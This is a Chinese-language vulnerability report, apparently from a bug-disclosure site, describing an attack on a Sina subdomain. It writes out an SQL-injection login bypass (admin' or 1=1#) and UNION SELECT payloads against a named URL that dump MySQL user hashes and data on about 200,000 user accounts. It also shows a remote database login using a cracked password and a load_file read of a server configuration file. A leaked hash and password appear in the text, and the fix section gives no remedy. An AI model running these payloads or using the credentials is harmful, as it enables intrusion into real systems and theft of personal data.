后台直接用admin'or 1=1# 登陆 找到注入点MYSQL外连 详细说明:目标站http://bes.sina.net 进入后台 竟然还要账号密码。。开什么玩笑 直接用户名admin' or 1=1# 密码随意写123456 成功登陆 ok 点来点去 找到个注入点http://bes.sina.net/content_detail.php?content_id=199 之后 http://bes.sina.net/content_detail.php?content_id=199 and 1=2 union all selEct group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),2,3,4,5,6 from+mysql.user-- yaoya:*B30D63E3C0BEE74D8A017AD371EB8810F01093CC:Y:% 可以MYSQL外连 破解了MD5 madwolf 成功连上 数据库还不少啊 http://bes.sina.net/content_detail.php?content_id=199%20aNd%201=2%20unIon%20all%20selEct%20concat%280x3a,email,0x3a,city,0x3a,login_time,province,ad_login_num,reg_time%29,2,3,4,5,6%20from%20rmail.ad_admin65%20limit%20268994,1%23 20W条邮箱啊。。可惜没密码 其他数据库不解释了 写入一句话不成功啊。。貌似目录没权限 读读配置吧 select load_file('/data0/apache/conf/extra/httpd-vhosts.conf') 完结。。 求证书+礼物啊。。 漏洞 证明: http://bes.sina.net/content_detail.php?content_id=199 and 1=2 union all selEct group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),2,3,4,5,6 from+ mysql .user-- 修复方案: 怎么修复你们懂得 作者 灰太狼
查看更多关于新浪子域名后台sql注射引发的血案 - 网站安全的详细内容...